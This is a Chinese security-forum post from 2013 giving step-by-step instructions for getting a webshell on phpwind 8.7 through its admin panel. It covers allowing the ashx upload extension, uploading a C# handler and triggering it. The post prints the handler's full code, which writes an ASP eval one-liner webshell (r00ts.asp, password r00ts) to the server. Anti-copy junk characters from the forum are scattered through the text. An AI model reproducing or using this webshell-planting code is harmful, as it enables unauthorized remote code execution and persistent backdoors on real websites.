找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2092|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小* N9 g: U  W/ w: s

# ]; Z* b" D) ?8 m" h' V2 }& g+ [% L群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
; Z3 k3 H& a: P8 @( r4 a" V
+ S) Z  s& r( A' V, b/ Y& k发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整& u7 ]/ C; A* E% K/ v! e" z
' r/ s  q/ C& E$ v1 B8 `' O
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
7 V5 Z! T( [0 z ) N" s9 `, N3 b7 N7 T  F
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
, R' `7 T# A0 F, h* V; |* Z0 d1 Y 1 O/ t+ j, k$ Q, m3 q& R# y
下面是代码:
; i+ y0 ^8 ^" K; A. c* ]  \, | , A- }6 h1 C  Z+ m8 h2 k
<%@ WebHandler Language="C#"Class="Handler" %>3 z* O, J$ {3 {: R1 l' d
using System;2 t6 G" D0 R# Q9 M* W5 e# M6 q1 A# g
using System.Web;( D2 l1 H0 l0 m0 n  E9 V" B& s
using System.IO;
, L% d; u1 ~2 t9 e- tpublic class Handler : IHttpHandler {+ S5 _9 s9 T! w: h( n
public void ProcessRequest (HttpContext context) {$ ?& B/ M: R$ r* B) P+ X5 K+ `" m8 f
context.Response.ContentType = "text/plain";
1 z4 q! ^$ w# Q" e' }! AStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));/ z3 y0 R+ m% N) z  h
file1.Write("<%eval request(\"r00ts\")%>");
5 }: ^* X2 T3 Q+ ]/ ?file1.Flush();4 I! C( x! s' q# _
file1.Close();
  H: v' ]" y! R3 M* t8 B! f+ u}% O( d! f3 H. Y3 f3 j; K( N' P! _$ q/ [
public bool IsReusable {
1 y% U* [$ j( I; E# q5 Tget {/ `7 _- u) P" L+ q4 i% g
return false;
  ^* I9 D6 X% o) l6 y# Y  J}
2 V; B( Q0 j7 j$ M2 R/ R}; w* z) o1 o  K% e
}
' J& n+ J* o* r4 z2 ~  I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表